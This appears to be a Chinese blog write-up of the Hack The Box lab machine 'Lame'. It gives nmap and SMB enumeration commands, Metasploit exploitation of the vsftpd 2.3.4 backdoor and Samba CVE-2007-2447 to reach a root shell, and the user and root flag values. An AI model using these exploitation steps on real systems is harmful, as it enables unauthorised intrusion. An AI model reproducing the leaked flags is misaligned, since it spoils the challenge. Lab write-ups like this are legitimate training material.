目录
1.How many of the nmap top 1000 TCP ports are open on the remote host?
2.What version of VSFTPd is running on Lame?
4.What version of Samba is running on Lame? Give the numbers up to but not including "-Debian".
6.Exploiting CVE-2007-2447 returns a shell as which user?
7.Submit the flag located in the makis user's home directory.
USER_FLAG:f249448c9d70f706133439ab6b4e18ce
8.Submit the flag located in root's home directory.
ROOT_FLAG:01a51cb525aa507c6e1f7745bc85ab97
10.When the VSFTPd backdoor is trigger, what port starts listening?
11.When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?
连接至HTB服务器并启动靶机
靶机IP:10.10.10.3
分配IP:10.10.16.7
1.How many of the nmap top 1000 TCP ports are open on the remote host?
使用nmap对靶机进行前1000端口进行扫描:
nmap -p1-1000 -T4 --min-rate=1000 -sS {TARGET_IP}
由扫描结果可见,靶机开放端口:21、22、139、445共4个端口
2.What version of VSFTPd is running on Lame?
使用nmap对靶机21端口进行脚本、服务信息扫描:
nmap -p 21 -sC -sV {TARGET_IP}
由扫描结果可见,在VERSION栏目下vsftpd的版本为:2.3.4
3.There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?
启动Metasploit:
msfconsole搜索VSFTPd 2.3.4相关漏洞信息:
search vsftpd 2.3.4
使用该漏洞利用模块:
use exploit/unix/ftp/vsftpd_234_backdoor展示可填写选项:
show options将靶机IP入RHOSTS选项:
set rhosts {TARGET_IP}尝试进行漏洞利用:
exploit
可见漏洞利用失败(no),需要指定一个用户密码
4.What version of Samba is running on Lame? Give the numbers up to but not including "-Debian".
使用nmap分别对靶机139、445端口进行脚本、服务信息扫描:
nmap -p 139,445 -sC -sV {TARGET_IP}
由扫描结果可见,靶机Samba服务器版本为:3.0.20
5.What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf?
这里直接使用谷歌搜索相关漏洞:CVE-2007-2447
6.Exploiting CVE-2007-2447 returns a shell as which user?
访问靶机samba服务器列出靶机所有共享,空密码进入:
smbclient -L {TARGET_IP}
使用smbmap工具扫描各共享的权限设置:
smbmap -H {TARGET_IP}
由smbmap工具扫描结果可见,仅有tmp共享具有读写权限
列举tmp共享中的所有文件
没有敏感信息文件,只能尝试从Samba服务器版本3.0.20下手
在msfconsole下查询samba 3.0.20是否存在漏洞:
使用该模块:
use use exploit/multi/samba/usermap_script查看该漏洞利用模块的配置参数:
show options
将靶机IP填入RHOSTS:
set rhosts {TARGET_IP}将本机IP填入LHOST:
set lhost {NATIVE_IP}开始漏洞利用:
exploit
可以看到当前用户为:root
7.Submit the flag located in the makis user's home directory.
查找makis目录路径:
find / -name 'makis' 2>/dev/null进入该目录下:
cd /home/makis列出该目录下文件:
ls查看user.txt文件内容:
cat user.txt
USER_FLAG:f249448c9d70f706133439ab6b4e18ce
8.Submit the flag located in root's home directory.
直接查找root.txt文件路径,并查看文件内容:
cat `find / -name 'root.txt' 2>/dev/null`
ROOT_FLAG:01a51cb525aa507c6e1f7745bc85ab97
9.We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the boxes external IP, so they should be accessible. What must be blocking connection to these ports?
利用script命令切换成可交互shell:
script /dev/null -c bash查看靶机网络连接:
netstat -tnlp
可以看到靶机的本地21端口是开放监听的,但是漏洞利用流量被防火墙拦截了(firewall)
如果需要利用这个漏洞,只能本地网络环境用户利用它进行提权
10.When the VSFTPd backdoor is trigger, what port starts listening?
直接通过谷歌搜索可知,该漏洞利用会触发vsf_sysutil_extra()函数,并打开系统的6200端口
利用searchsploit工具,对该漏洞exp进行搜索
11.When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?
运行exp脚本:
python2 49757.py {TARGET_IP}为了方便演示提权,先将root用户切换成makis用户:
su makis -c bash使用netcat连接靶机本地6200端口:
nc 127.0.0.1 6200root@lame:/# su makis -c bash
makis@lame:/$ nc 127.0.0.1 6200
(UNKNOWN) [127.0.0.1] 6200 (?) : Connection refused
makis@lame:/$ nc 127.0.0.1 6200
whoami
root
成功提权到root用户
标签:HTB,Lame,nmap,WriteUP,makis,VSFTPd,IP,靶机,root From: https://blog.csdn.net/qq_43007452/article/details/142895280